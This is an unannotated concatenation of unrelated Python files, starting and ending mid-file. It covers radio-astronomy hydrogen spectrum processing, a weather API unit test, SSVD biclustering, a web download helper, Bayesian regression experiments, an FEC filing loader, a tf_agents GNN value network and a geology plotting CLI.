        loc = EarthLocation.from_geodetic(obs_SiteLon,obs_SiteLat,obs_SiteHei)
        # Right ascension/declination of the observed source, using the ICRS (celestial) frame
        Source = SkyCoord(self.obs_Source,frame='icrs')
        # Read the spectrum file and get the observed frequency points
        spec_freq = self.spec[:,0]
        # Relative velocity along the line of sight between the observer on Earth and the neutral hydrogen, i.e. the radial velocity
        # By the Doppler effect, each frequency point corresponds to a different radial velocity
        rv = (self.obs_Freq-spec_freq)*c/self.obs_Freq
        # The radial velocity vr is the line-of-sight velocity between observer and neutral hydrogen.
        # We now want the velocity between the solar-system barycentre (roughly, an observer at the Sun)
        # and the hydrogen along their connecting line, i.e. a coordinate change, so a velocity correction term is needed
        vcorr = Source.radial_velocity_correction(kind='barycentric',obstime=obs_Time, location=loc)
        # Adding the correction term gives the radial velocity of the neutral hydrogen as seen from the Sun
        # Convert m/s to km/s, then take the numerical value
        rv = (rv + vcorr + rv*vcorr/c)
        rv = rv.to(u.km/u.s).to_value()
        # At higher frequencies (blue shift) rv is negative; at lower frequencies (red shift) rv is positive,
        # so rv currently runs from positive to negative; reverse it
        rv = rv[::-1]
        return rv

    """
    Get the equivalent temperature corresponding to the spectral intensity (power level)
    Return type: 1-D numpy.ndarray
    Return value: equivalent temperature for each radial velocity (frequency)
    Example: [1.31519478 1.26451874 ... 1.40664323 1.37319388 1.22032352]
    """
    def get_EquiTemp(self):
        spec_freq = self.spec[:,0]
        spec_level = self.spec[:,1]
        # Observing bandwidth; frequencies are in MHz, so multiply by 10^6
        spec_width = (spec_freq[-1]-spec_freq[0])*np.power(10,6)
        # From Nyquist (thermal) noise, P = k*B*T, where P is power, k the Boltzmann constant,
        # B the bandwidth and T the temperature, so the power can be expressed as an equivalent temperature
        # The resulting magnitude is very large, so scale it down (here by 10^-14)
        equiTemp = (spec_level/k_B/spec_width)*pow(10,-14)
        # rv is reversed, so reverse equiTemp as well to keep the two aligned
        equiTemp = equiTemp[::-1]
        # Because the astropy constant k_B appears in the expression, equiTemp is an astropy quantity;
        # take its numerical value
        equiTemp = equiTemp.to_value()
        return equiTemp

    """
    Get the radial velocity rv between -150 and 150 km/s and the corresponding equivalent temperature T, then smooth it
    Return type: 1-D numpy.ndarray, 1-D numpy.ndarray
    Return value: radial velocity, equivalent temperature
    Example: [-148.58293111 ... 146.13853902],[1.31519478 ... 1.22032352]
    """
    def get_VT(self):
        rv = self.get_CorrectVel()
        equiTemp = self.get_EquiTemp()
        rv_index = np.where((rv>-150)&(rv<150))[0]
        rv_start = rv_index[0]
        rv_end = rv_index[-1]
        rv_150 = rv[rv_start:rv_end]
        equiTemp_150 = equiTemp[rv_start:rv_end]
        return rv_150,equiTemp_150

    # def get_Smooth(self):
    #     rv, equiTemp = self.get_VT()
    #     # Smooth the values
    #     # The 1/20 controls the amount of smoothing and can be adjusted
    #     T_Smooth = lowess(equiTemp,rv,frac=self.Smooth)[:,1]
    #     return rv,T_Smooth,equiTemp

    """
    Smooth the radial velocity rv vs equivalent temperature equiTemp curve,
    where vr lies between -150 km/s and 150 km/s
    Return type: 1-D numpy.ndarray, 1-D numpy.ndarray, 1-D numpy.ndarray
    Return value: radial velocity, smoothed equivalent temperature, unsmoothed equivalent temperature
    Example: [-148.58293111 ... 146.13853902],[1.31519478 ... 1.22032352],[1.31519478 ... 1.22032352]
    """
    def get_Smooth(self):
        rv, equiTemp = self.get_VT()
        # Smooth the values
        T_Smooth = signal.savgol_filter(equiTemp,self.smooth_Window,self.smooth_k)
        return rv,T_Smooth,equiTemp

    """
    Plot the spectrum
    """
    def get_Plot(self):
        plt.figure()
        # Use a font that supports CJK characters
        plt.rcParams['font.sans-serif'] = ['SimHei']
        plt.rcParams['axes.unicode_minus'] = False
        # Unsmoothed
        plt.subplot(2,1,1)
        plt.plot(self.rv,self.equiTemp)
        plt.title(self.obs_Source + ' ' + self.obs_Time)
        # Smoothed
        plt.subplot(2,1,2)
        plt.plot(self.rv,self.equiTemp_Smooth)
        plt.xlabel('Radial velocity vr of the neutral hydrogen cloud relative to the Sun (km/s)')
        plt.ylabel('Equivalent temperature T (K)')
        # Mark the peaks and the point of maximum radial velocity
        for i in range(0,len(self.T_Array)):
            plt.scatter(self.rv_Array[i],self.T_Array[i],s=25,c='r')
            plt.text(self.rv_Array[i],self.T_Array[i],\
                str(np.around(self.rv_Array[i],3))+','+str(np.around(self.T_Array[i],3)),\
                fontdict={'fontsize':8})
        # Name the output file after the galactic longitude, to one decimal place
        plt.savefig('Images/'+str(np.around(self.obs_GalLon,1))+'.png')
        plt.clf()    # clear the figure
        plt.cla()    # clear the axes
        plt.close()  # close the window

    """
    Find the highest peak and the peaks beside it, i.e. an extremum-finding problem
    Return type: 1-D numpy.ndarray, 1-D numpy.ndarray
    Return value: radial velocities of the peaks plus the maximum radial velocity, and the corresponding equivalent temperatures
    Example: [-148.58293111 ... 146.13853902],[1.31519478 ...
1.22032352] """ def get_Peaks(self): # 观察频谱规律后,对于银经0到90°,270°到360°,寻峰算法如下 # 求取最高峰所在位置 max_Index = np.argmax(self.equiTemp_Smooth) # 峰值间的最小间隔点数,两峰之间的间隔需大于此 # 此处设两峰之间的间隔需大于30km/s lim_Distance = np.ceil((30*len(self.equiTemp_Smooth)/300)) # 寻峰,即求极值点 # 此处只求最大峰及其左边的峰 peaks =signal.find_peaks(self.equiTemp_Smooth[0:max_Index+2],distance = lim_Distance)[0] # 找出极大值对应的径向速度和等效温度 T_Array = np.array([]) rv_Array = np.array([]) for peak in peaks: T_Array= np.append(T_Array,self.equiTemp_Smooth[peak]) rv_Array = np.append(rv_Array,self.rv[peak]) # 按峰值降序排序,得到索引 Order = T_Array.argsort()[::-1] # 利用索引对径向速度和等效温度进行排序 rv_Array = rv_Array[Order] T_Array = T_Array[Order] # 在尾端加入最大径向速度 mark_Vel,mark_T = self.get_MaxVel() rv_Array = np.append(rv_Array,mark_Vel) T_Array = np.append(T_Array,mark_T) return rv_Array,T_Array """ 获取氢谱线峰的最大径向速度,以及对应的等效温度 峰是弥散开来,可以求右边最高峰衰减到一定值处对应的速度 返回类型: float 返回结果:最大径向速度,等效温度 """ def get_MaxVel(self): # 此处以(右边最高峰)衰减到(右边最高峰)的右边频谱积分平值为截止标准 max_Index = np.argmax(self.equiTemp_Smooth) mark_Index = self.get_RightFirst(self.equiTemp_Smooth,max_Index) mark_Vel = self.rv[mark_Index] mark_T = self.equiTemp_Smooth[mark_Index] return mark_Vel,mark_T """ 返回第一个小于右边频谱积分平值的索引 返回类型: int 返回结果:索引 """ def get_RightFirst(self,Arr,Index): # 边缘峰的右边频谱的积分平均值 # 不能用[Index:-1],可以实际测试一下 spec_Ave = np.sum(Arr[Index:len(Arr)])/len(Arr[Index:len(Arr)]) # 寻求第一个小于spec_Ave对应的索引 for i in range(Index,len(Arr)): i+1 if Arr[i] <= spec_Ave: break return i #!/usr/bin/env python import os import time import unittest import json import responses import herepy class DestinationWeatherApiTest(unittest.TestCase): def setUp(self): api = herepy.DestinationWeatherApi('app_id', 'app_code') self._api = api def test_initiation(self): self.assertIsInstance(self._api, herepy.DestinationWeatherApi) self.assertEqual(self._api._app_id, 'app_id') self.assertEqual(self._api._app_code, 'app_code') self.assertEqual(self._api._base_url, 'https://weather.api.here.com/weather/1.0/report.json') @responses.activate def test_forecast_astronomy_whensucceed(self): with open('testdata/models/destination_weather.json', 'r') as f: expectedResponse = f.read() responses.add(responses.GET, 'https://weather.api.here.com/weather/1.0/report.json', expectedResponse, status=200) response = self._api.forecast_astronomy('London') self.assertTrue(response) self.assertIsInstance(response, herepy.DestinationWeatherResponse) @responses.activate def test_forecast_astronomy_whenerroroccured(self): with open('testdata/models/destination_weather_error.json', 'r') as f: expectedResponse = f.read() responses.add(responses.GET, 'https://weather.api.here.com/weather/1.0/report.json', expectedResponse, status=200) with self.assertRaises(herepy.HEREError): self._api.forecast_astronomy('London') zhangjx1996/STA-663-Final-Project from SSVD import ssvd_opt import matplotlib.pyplot as plt import seaborn as sns import numpy as np def biclusterplot(u,s,v,ax,title = "title"): u = np.sort(u)/np.max(np.abs(u)) v = np.sort(v)/np.max(np.abs(v)) X = s*np.outer(u,v) sns.heatmap(X, cmap ="RdBu",vmin = -1,vmax = 1, ax = ax).set_title(title) u_til = np.r_[np.arange(3,11)[::-1], 2*np.ones(17), np.zeros(75)].reshape(-1,1) u_til = u_til/np.linalg.norm(u_til) v_til = np.r_[np.array([10,-10,8,-8,5,-5]),3*np.ones(5),-3*np.ones(5),np.zeros(34)].reshape(-1,1) v_til = v_til/np.linalg.norm(v_til) s = 50 X_sim = s*u_til@v_til.T n,p = X_sim.shape X_sim = X_sim + np.random.randn(n,p) fig, axes = plt.subplots(1,2,figsize=(15,5)) u1, s1, v1, iters = ssvd_opt(X_sim) sns.heatmap(X_sim, cmap ="RdBu",vmin = 
-1,vmax = 1,ax=axes[0]).set_title("Original Simulated data") biclusterplot(u1,s1,v1,ax = axes[1],title = "bicluster by ssvd") backup/www/scrapy/chapter02/common.py import urllib.request as urllib2 def download(url, user_agent=None): print('Downloading:%s' % url) headers = {'User-agent': user_agent or 'wswp'} request = urllib2.Request(url, headers=headers) try: html = urllib2.urlopen(request).read().decode('utf-8') except urllib2.URLError as e: print('Download error:%s' % e.reason) html = None return html if __name__ == '__main__': print(download('http://example.webscraping.com')) import os import sys import copy import torch import pickle import argparse import warnings import numpy as np import pandas as pd import sklearn as skl import tensorflow as tf from regression_data import generate_toy_data from callbacks import RegressionCallback from regression_models import prior_params, NormalRegression, StudentRegression, VariationalPrecisionNormalRegression from utils_model import monte_carlo_student_t # import Detlefsen baseline model sys.path.append(os.path.join(os.getcwd(), 'john-master')) from toy_regression import detlefsen_toy_baseline from experiment_regression import detlefsen_uci_baseline # set results directory globally since its used all over this file RESULTS_DIR = 'results' class MeanVarianceLogger(object): def __init__(self, df_data=None, df_eval=None): self.cols_data = ['Algorithm', 'Prior', 'x', 'y'] self.df_data = pd.DataFrame(columns=['Algorithm', 'Prior', 'x', 'y']) if df_data is None else df_data self.cols_eval = ['Algorithm', 'Prior', 'x', 'mean(y|x)', 'std(y|x)'] self.df_eval = pd.DataFrame(columns=self.cols_eval) if df_eval is None else df_eval @staticmethod def __to_list(val): if isinstance(val, tf.Tensor): val = val.numpy() assert isinstance(val, np.ndarray) val = np.squeeze(val) return val.tolist() def update(self, algorithm, prior, x_train, y_train, x_eval, mean, std, trial): # update training points data frame algorithm_list = [algorithm] * len(x_train) prior_list = [prior] * len(x_train) x_train = self.__to_list(x_train) y_train = self.__to_list(y_train) df_new = pd.DataFrame(dict(zip(self.cols_data, (algorithm_list, prior_list, x_train, y_train))), index=[trial] * len(x_train)) self.df_data = self.df_data.append(df_new) # update evaluation data frame algorithm_list = [algorithm] * len(x_eval) prior_list = [prior] * len(x_eval) x_eval = self.__to_list(x_eval) mean = self.__to_list(mean) std = self.__to_list(std) df_new = pd.DataFrame(dict(zip(self.cols_eval, (algorithm_list, prior_list, x_eval, mean, std))), index=[trial] * len(x_eval)) self.df_eval = self.df_eval.append(df_new) def compute_metrics(y_eval, y_mean, y_std, y_new): y_eval = tf.cast(y_eval, tf.float64) y_mean = tf.cast(y_mean, tf.float64) y_std = tf.cast(y_std, tf.float64) y_new = tf.cast(y_new, tf.float64) mean_residuals = y_mean - y_eval var_residuals = y_std ** 2 - mean_residuals ** 2 sample_residuals = y_new - y_eval metrics = { 'Mean Bias': tf.reduce_mean(mean_residuals).numpy(), 'Mean RMSE': tf.sqrt(tf.reduce_mean(mean_residuals ** 2)).numpy(), 'Var Bias': tf.reduce_mean(var_residuals).numpy(), 'Var RMSE': tf.sqrt(tf.reduce_mean(var_residuals ** 2)).numpy(), 'Sample Bias': tf.reduce_mean(sample_residuals).numpy(), 'Sample RMSE': tf.sqrt(tf.reduce_mean(sample_residuals ** 2)).numpy() } return metrics def train_and_eval(dataset, algo, prior, epochs, batch_size, x_train, y_train, x_eval, y_eval, parallel, **kwargs): # toy data configuration if dataset == 'toy': # hyper-parameters d_hidden = 50 
f_hidden = 'sigmoid' learning_rate = 5e-3 num_mc_samples = 50 early_stopping = False # prior parameters k = 20 u = np.expand_dims(np.linspace(np.min(x_eval), np.max(x_eval), k), axis=-1) a, b = prior_params(kwargs.get('precisions'), prior_fam='Gamma') # UCI data configuration else: # hyper-parameters d_hidden = 100 if dataset in {'protein', 'year'} else 50 f_hidden = 'elu' learning_rate = 1e-3 num_mc_samples = 20 early_stopping = True # prior parameters if kwargs.get('k') is None: k = None u = None else: k = kwargs.get('k') u = x_train[np.random.choice(x_train.shape[0], min(x_train.shape[0], k), replace=False)] a = kwargs.get('a') b = kwargs.get('b') # create TF data loaders ds_train = tf.data.Dataset.from_tensor_slices({'x': x_train, 'y': y_train}) ds_train = ds_train.shuffle(10000, reshuffle_each_iteration=True).batch(batch_size) ds_eval = tf.data.Dataset.from_tensor_slices({'x': x_eval, 'y': y_eval}) ds_eval = ds_eval.shuffle(10000, reshuffle_each_iteration=True).batch(batch_size) # pick appropriate model and gradient clip value if algo == 'Normal': model = NormalRegression elif algo == 'Student': model = StudentRegression else: model = VariationalPrecisionNormalRegression # declare model instance mdl = model(d_in=x_train.shape[1], d_hidden=d_hidden, f_hidden=f_hidden, d_out=y_train.shape[1], y_mean=0.0 if dataset == 'toy' else np.mean(y_train, axis=0), y_var=1.0 if dataset == 'toy' else np.var(y_train, axis=0), prior_type=prior, prior_fam='Gamma', num_mc_samples=num_mc_samples, a=a, b=b, k=k, u=u) # relevant metric names model_ll = 'val_Model LL' mean_mse = 'val_Mean MSE' # train the model callbacks = [RegressionCallback(epochs, parallel)] if early_stopping: callbacks += [tf.keras.callbacks.EarlyStopping(monitor=model_ll, min_delta=1e-4, patience=50, mode='max', restore_best_weights=True)] mdl.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=learning_rate), loss=[None]) hist = mdl.fit(ds_train, validation_data=ds_eval, epochs=epochs, verbose=0, callbacks=callbacks) # test for NaN's nan_detected = bool(np.sum(np.isnan(hist.history['loss']))) # get index of best validation log likelihood i_best = np.nanargmax(hist.history[model_ll]) if np.nanargmax(hist.history[model_ll]) >= 0.9 * epochs: warnings.warn('Model not converged!') # retrieve performance metrics ll = hist.history[model_ll][i_best] mean_rmse = np.sqrt(hist.history[mean_mse][i_best]) # evaluate predictive model with increased Monte-Carlo samples (if sampling is used by the particular model) mdl.num_mc_samples = 2000 y_mean, y_std, y_new = mdl.predictive_moments_and_samples(x_eval) metrics = {'LL': ll, 'Mean RMSL2': mean_rmse} metrics.update(compute_metrics(y_eval, y_mean, y_std, y_new)) return mdl, metrics, y_mean, y_std, nan_detected def run_experiments(algo, dataset, mode='resume', parallel=False, **kwargs): assert algo in {'Detlefsen', 'Detlefsen (fixed)', 'Normal', 'Student', 'Gamma-Normal'} assert not (algo == 'Detlefsen (fixed)' and dataset != 'toy') assert mode in {'replace', 'resume'} # parse algorithm/prior names if algo == 'Gamma-Normal': prior_fam = 'Gamma' prior_type = kwargs.pop('prior_type') base_name = algo + '_' + prior_type else: prior_fam = '' prior_type = 'N/A' base_name = algo # dataset specific hyper-parameters n_trials = 10 if dataset in {'toy', 'protein', 'year'} else 20 batch_size = 500 if dataset == 'toy' else 256 if dataset == 'toy': batch_iterations = int(6e3) elif dataset in {'carbon', 'naval', 'power plant', 'superconductivity'}: batch_iterations = int(1e5) else: batch_iterations = int(2e4) # 
establish experiment directory experiment_dir = 'regression_toy' if dataset == 'toy' else 'regression_uci' os.makedirs(os.path.join(RESULTS_DIR, experiment_dir), exist_ok=True) # parse prior type hyper-parameters if prior_type == 'Standard' and dataset != 'toy': # if prior parameters not provided, use best discovered parameter set from VBEM if kwargs.get('a') is None or kwargs.get('b') is None: relevant_prior_file = os.path.join(RESULTS_DIR, experiment_dir, dataset, algo + '_VBEM_prior.pkl') assert os.path.exists(relevant_prior_file) prior_params = pd.read_pickle(relevant_prior_file) a, b = np.squeeze(pd.DataFrame(prior_params.groupby(['a', 'b'])['wins'].sum().idxmax()).to_numpy()) kwargs.update({'a': a, 'b': b}) base_name += ('_' + str(kwargs.get('a')) + '_' + str(kwargs.get('b'))) hyper_params = 'a={:f},b={:f}'.format(kwargs.get('a'), kwargs.get('b')) elif 'VAMP' in prior_type or prior_type == 'VBEM*': base_name += ('_' + str(kwargs.get('k'))) hyper_params = 'k={:d}'.format(kwargs.get('k')) else: hyper_params = 'None' base_name = base_name.replace(' ', '').replace('*', 't') # make sure results subdirectory exists os.makedirs(os.path.join(RESULTS_DIR, experiment_dir, dataset), exist_ok=True) # create full file names logger_file = os.path.join(RESULTS_DIR, experiment_dir, dataset, base_name + '.pkl') nan_file = os.path.join(RESULTS_DIR, experiment_dir, dataset, base_name + '_nan_log.txt') data_file = os.path.join(RESULTS_DIR, experiment_dir, dataset, base_name + '_data.pkl') mv_file = os.path.join(RESULTS_DIR, experiment_dir, dataset, base_name + '_mv.pkl') prior_file = os.path.join(RESULTS_DIR, experiment_dir, dataset, base_name + '_prior.pkl') # load results if we are resuming if mode == 'resume' and os.path.exists(logger_file): logger = pd.read_pickle(logger_file) if dataset == 'toy': mv_logger = MeanVarianceLogger(df_data=pd.read_pickle(data_file), df_eval=pd.read_pickle(mv_file)) if prior_type == 'VBEM': vbem_logger = pd.read_pickle(prior_file) t_start = max(logger.index) print('Resuming', dataset, algo, prior_type, 'at trial {:d}'.format(t_start + 2)) # otherwise, initialize the loggers else: logger = pd.DataFrame(columns=['Algorithm', 'Prior', 'Hyper-Parameters', 'LL', 'Mean RMSL2', 'Mean Bias', 'Mean RMSE', 'Var Bias', 'Var RMSE', 'Sample Bias', 'Sample RMSE']) if os.path.exists(nan_file): os.remove(nan_file) if dataset == 'toy': mv_logger = MeanVarianceLogger() if prior_type == 'VBEM': vbem_logger = pd.DataFrame(columns=['a', 'b', 'wins']) t_start = -1 # loop over the trials for t in range(t_start + 1, n_trials): if not parallel: print('\n*****', dataset, 'trial {:d}/{:d}:'.format(t + 1, n_trials), algo, prior_type, '*****') # set random number seeds seed = args.seed_init * (t + 1) np.random.seed(seed) tf.random.set_seed(seed) torch.manual_seed(seed) torch.backends.cudnn.deterministic = True torch.backends.cudnn.benchmark = False # toy data if dataset == 'toy': # generate data x_train, y_train, x_eval, y_eval, true_std = generate_toy_data() # compute true precisions kwargs.update({'precisions': 1 / true_std[(np.min(x_train) <= x_eval) * (x_eval <= np.max(x_train))] ** 2}) # uci data else: # load and split data with open(os.path.join('data', dataset, dataset + '.pkl'), 'rb') as f: data_dict = pickle.load(f) x, y = data_dict['data'], data_dict['target'] x_train, x_eval, y_train, y_eval = skl.model_selection.train_test_split(x, y, test_size=0.1) # scale features x_scale = skl.preprocessing.StandardScaler().fit(x_train) x_train = x_scale.transform(x_train) x_eval = 
x_scale.transform(x_eval) # compute epochs to correspond to the number of batch iterations (as used by Detlefsen) epochs = round(batch_iterations / int(np.ceil(x_train.shape[0] / batch_size))) # run appropriate algorithm nan_detected = False if algo == 'Detlefsen' and dataset == 'toy': ll, mean_rmse, mean, std = detlefsen_toy_baseline(x_train, y_train, x_eval, y_eval, bug_fix=False) metrics = {'LL': ll, 'Mean RMSL2': mean_rmse} elif algo == 'Detlefsen (fixed)' and dataset == 'toy': ll, mean_rmse, mean, std = detlefsen_toy_baseline(x_train, y_train, x_eval, y_eval, bug_fix=True) metrics = {'LL': ll, 'Mean RMSL2': mean_rmse} elif algo == 'Detlefsen' and dataset != 'toy': ll, rmsl2, mean, var_samples = detlefsen_uci_baseline(x_train, y_train, x_eval, y_eval, batch_iterations, batch_size, copy.deepcopy(parser)) py_x = monte_carlo_student_t(mean, 1 / var_samples) metrics = {'LL': ll, 'Mean RMSL2': rmsl2} metrics.update(compute_metrics(y_eval, py_x.mean(), py_x.stddev(), py_x.sample())) else: mdl, metrics, mean, std, nan_detected = train_and_eval(dataset, algo, prior_type, epochs, batch_size, x_train, y_train, x_eval, y_eval, parallel, **kwargs) # save top priors for VBEM if prior_type == 'VBEM': indices, counts = np.unique(np.argmax(mdl.pi(x_eval), axis=1), return_counts=True) for i, c in zip(indices, counts): a = tf.nn.softplus(mdl.u[i]).numpy()[0] b = tf.nn.softplus(mdl.v[i]).numpy()[0] vbem_logger = vbem_logger.append(pd.DataFrame({'a': a, 'b': b, 'wins': c}, index=[t])) vbem_logger.to_pickle(prior_file) # print update print(dataset, algo, prior_type, '{:d}/{:d}:'.format(t + 1, n_trials)) print(metrics) # print and log NaNs if nan_detected: print('**** NaN Detected ****') print(dataset, prior_fam, prior_type, t + 1, file=open(nan_file, 'a')) # save results metrics.update({'Algorithm': algo, 'Prior': prior_type, 'Hyper-Parameters': hyper_params}) logger = logger.append(pd.DataFrame(metrics, index=[t])) logger.to_pickle(logger_file) if dataset == 'toy': mv_logger.update(algo, prior_type, x_train, y_train, x_eval, mean, std, trial=t) mv_logger.df_data.to_pickle(data_file) mv_logger.df_eval.to_pickle(mv_file) if __name__ == '__main__': # script arguments parser = argparse.ArgumentParser() parser.add_argument('--algorithm', type=str, default='Normal', help='algorithm') parser.add_argument('--dataset', type=str, default='boston', help='data set name = {toy} union UCI sets') parser.add_argument('--mode', type=str, default='resume', help='mode in {replace, resume}') parser.add_argument('--prior_type', type=str, help='prior type') parser.add_argument('--a', type=float, help='standard prior parameter') parser.add_argument('--b', type=float, help='standard prior parameter') parser.add_argument('--k', type=int, help='number of mixing prior components') parser.add_argument('--parallel', type=int, default=0, help='adjust console print out for parallel runs') parser.add_argument('--seed_init', default=1234, type=int, help='random seed init, multiplied by trial number') args = parser.parse_args() # check inputs assert args.dataset in {'toy'}.union(set(os.listdir('data'))) # assemble configuration dictionary KWARGS = {} if args.prior_type is not None: KWARGS.update({'prior_type': args.prior_type}) if args.a is not None: KWARGS.update({'a': args.a}) if args.b is not None: KWARGS.update({'b': args.b}) if args.k is not None: KWARGS.update({'k': args.k}) # make result directory if it doesn't already exist os.makedirs(RESULTS_DIR, exist_ok=True) # run experiments run_experiments(args.algorithm, args.dataset, 
args.mode, bool(args.parallel), **KWARGS) import pytz import datetime import os import requests import csv import process_filing import time import traceback import sys from cycle_2020.models import * from cycle_2020.utils import loader from django.core.management.base import BaseCommand, CommandError from utils.date_validation import date_validation import logging, uuid import systemd.daemon systemd.daemon.notify('READY=1') LOGLEVEL = os.environ.get('LOGLEVEL', 'INFO').upper() SYSLOG_IDENTIFIER = os.environ.get('SYSLOG_IDENTIFIER','') logger = logging.getLogger("cnn-fec."+__name__) logger.setLevel(LOGLEVEL) myid=uuid.uuid4() class Command(BaseCommand): def add_arguments(self, parser): parser.add_argument('--filing_dir', dest='filing_dir', help='where to save and read filings from') #default is to do past two days def handle(self, *args, **options): fec_time=pytz.timezone('US/Eastern') #fec time is eastern unparsed_start = datetime.datetime.now(fec_time) - datetime.timedelta(days=2) start_date = unparsed_start.strftime('%Y%m%d') unparsed_end = datetime.datetime.now(fec_time) + datetime.timedelta(days=1) end_date = unparsed_end.strftime('%Y%m%d') if date_validation(os.environ.get('STARTDATE')): start_date = os.environ.get('STARTDATE') if date_validation(os.environ.get('ENDDATE')): end_date = os.environ.get('ENDDATE') if options['filing_dir']: filing_dir = options['filing_dir'] else: filing_dir = 'filings/' myextra = {'MESSAGE_ID':myid,'SYSLOG_IDENTIFIER':SYSLOG_IDENTIFIER} logger.info("looking for filings for period {}-{}".format(start_date, end_date), extra=myextra) filings = loader.get_filing_list(start_date, end_date, myextra=myextra) if not filings: logger.warning("failed to find any filings for period {}-{}".format(start_date, end_date), extra=myextra) loader.download_filings(filings, filing_dir, myextra=myextra) loader.load_filings(filing_dir,myextra=myextra) __version__ = '0.1.0' from .sms_service import SMSBackend try: from django.conf import settings backend = settings.EMAIL_BACKEND host = settings.POSTMAN_HOST e_route = settings.POSTMAN_EMAIL_ROUTE s_route = settings.POSTMAN_SMS_ROUTE auth = settings.POSTMAN_AUTHKEY except Exception as e: __RED = '\033[91m' raise NotImplementedError(__RED+'Make sure you have imported EMAIL_BACKEND and POSTMAN settings. Detailed ERROR, '+str(e) + __RED) sms_backend = SMSBackend() from .Plant import Plant from ..Position import Position from ..Action import Action from ..ActionEnum import ActionEnum class Toadstool(Plant): def __init__(self, toadstool=None, position=None, world=None): super(Toadstool, self).__init__(toadstool, position, world) def clone(self): return Toadstool(self, None, None) def initParams(self): self.power = 0 self.initiative = 0 self.liveLength = 10 self.powerToReproduce = 5 self.sign = 'T' def consequences(self, atackingOrganism): result = [] if self.power > atackingOrganism.power: result.append(Action(ActionEnum.A_REMOVE, Position(xPosition=-1, yPosition=-1), 0, atackingOrganism)) else: result.append(Action(ActionEnum.A_REMOVE, Position(xPosition=-1, yPosition=-1), 0, self)) result.append(Action(ActionEnum.A_REMOVE, Position(xPosition=-1, yPosition=-1), 0, atackingOrganism)) return result # Copyright (c) 2020 fortiss GmbH # # Authors: # # This work is licensed under the terms of the MIT license. # For a copy, see . 
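# The GNNValueNetwork defined below keeps the standard tf_agents value-network contract:
# observations in, one scalar value per batch item out, plus an (empty) network state.
# A minimal sketch of that contract using the stock tf_agents ValueNetwork; the
# 4-dimensional observation spec, the batch size and the layer sizes here are arbitrary
# placeholders, and tf_agents is assumed to be installed.
import tensorflow as tf
from tf_agents.networks import value_network

_demo_net = value_network.ValueNetwork(
    tf.TensorSpec([4], tf.float32), fc_layer_params=(75, 40))
_demo_values, _ = _demo_net(tf.random.uniform([3, 4]))  # _demo_values has shape [3]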
import gin import tensorflow as tf # pylint: disable=unused-import from tf_agents.networks import network, encoding_network from bark.runtime.commons.parameters import ParameterServer @gin.configurable class GNNValueNetwork(network.Network): """Feed Forward value network. Reduces to 1 value output per batch item.""" def __init__(self, input_tensor_spec, gnn, preprocessing_layers=None, preprocessing_combiner=None, conv_layer_params=None, fc_layer_params=(75, 40), dropout_layer_params=None, activation_fn=tf.nn.relu, kernel_initializer=None, batch_squash=False, dtype=tf.float32, name='ValueNetwork', params=ParameterServer()): """ Creates an instance of `ValueNetwork`. Network supports calls with shape outer_rank + observation_spec.shape. Note outer_rank must be at least 1. Args: input_tensor_spec: A `tensor_spec.TensorSpec` or a tuple of specs representing the input observations. preprocessing_layers: (Optional.) A nest of `tf.keras.layers.Layer` representing preprocessing for the different observations. All of these layers must not be already built. For more details see the documentation of `networks.EncodingNetwork`. preprocessing_combiner: (Optional.) A keras layer that takes a flat list of tensors and combines them. Good options include `tf.keras.layers.Add` and `tf.keras.layers.Concatenate(axis=-1)`. This layer must not be already built. For more details see the documentation of `networks.EncodingNetwork`. conv_layer_params: Optional list of convolution layers parameters, where each item is a length-three tuple indicating (filters, kernel_size, stride). fc_layer_params: Optional list of fully_connected parameters, where each item is the number of units in the layer. dropout_layer_params: Optional list of dropout layer parameters, each item is the fraction of input units to drop or a dictionary of parameters according to the keras.Dropout documentation. The additional parameter `permanent', if set to True, allows to apply dropout at inference for approximated Bayesian inference. The dropout layers are interleaved with the fully connected layers; there is a dropout layer after each fully connected layer, except if the entry in the list is None. This list must have the same length of fc_layer_params, or be None. activation_fn: Activation function, e.g. tf.keras.activations.relu,. kernel_initializer: Initializer to use for the kernels of the conv and dense layers. If none is provided a default variance_scaling_initializer batch_squash: If True the outer_ranks of the observation are squashed into the batch dimension. This allow encoding networks to be used with observations with shape [BxTx...]. dtype: The dtype to use by the convolution and fully connected layers. name: A string representing name of the network. Raises: ValueError: If input_tensor_spec is not an instance of network.InputSpec. 
""" super(GNNValueNetwork, self).__init__( input_tensor_spec=input_tensor_spec, state_spec=(), name=name) if not kernel_initializer: kernel_initializer = tf.compat.v1.keras.initializers.glorot_uniform() if gnn is None: raise ValueError('`gnn` must not be `None`.') self._gnn = gnn(name=name + "_GNN", params=params) self._encoder = encoding_network.EncodingNetwork( input_tensor_spec=tf.TensorSpec([None, self._gnn._embedding_size]), preprocessing_layers=None, preprocessing_combiner=None, conv_layer_params=conv_layer_params, fc_layer_params=fc_layer_params, dropout_layer_params=dropout_layer_params, activation_fn=tf.keras.activations.relu, kernel_initializer=kernel_initializer, batch_squash=False, dtype=tf.float32) self._postprocessing_layers = tf.keras.layers.Dense( 1, activation=None, kernel_initializer=tf.compat.v1.initializers.random_uniform( minval=-0.03, maxval=0.03)) def call(self, observations, step_type=None, network_state=(), training=False): # print(observations) if len(tf.shape(observations)) == 3: observations = tf.squeeze(observations, axis=0) embeddings = self._gnn(observations, training=training) if tf.shape(embeddings)[0] > 0: embeddings = embeddings[:, 0] # extract ego state with tf.name_scope("PPOCriticNetwork"): tf.summary.histogram("embedding", embeddings) state, network_state = self._encoder( embeddings, step_type=step_type, network_state=network_state, training=training) value = self._postprocessing_layers(state, training=training) value = tf.expand_dims(value, axis=0) return tf.squeeze(value, -1), network_state# -*- coding: utf-8 -*- # Royal HaskoningDHV from xsboringen.scripts.write_csv import write_csv from xsboringen.scripts.write_shape import write_shape from xsboringen.scripts.plot import plot_cross_section import click import yaml from collections import ChainMap import logging import os log = logging.getLogger(os.path.basename(__file__)) @click.command() @click.argument('function', type=click.Choice(['write_csv', 'write_shape', 'plot']), ) @click.argument('inputfile', ) @click.option('--logging', 'level', type=click.Choice(['warning', 'info', 'debug']), default='info', help='log messages level' ) def main(function, inputfile, level): '''plot geological cross-sections''' logging.basicConfig(level=level.upper()) # function arguments from input file with open(inputfile) as y: kwargs = yaml.load(y) # read default config scripts_folder = os.path.dirname(os.path.realpath(__file__)) defaultconfigfile = os.path.join(os.path.dirname(scripts_folder), 'defaultconfig.yaml') with open(defaultconfigfile) as y: defaultconfig = yaml.load(y) # get user config from input file userconfig = kwargs.get('config') or {} # chain config kwargs['config'] = ChainMap(userconfig, defaultconfig) # dispatch function if function == 'write_csv': write_csv(**kwargs) elif function == 'write_shape': write_shape(**kwargs) elif function == 'plot': 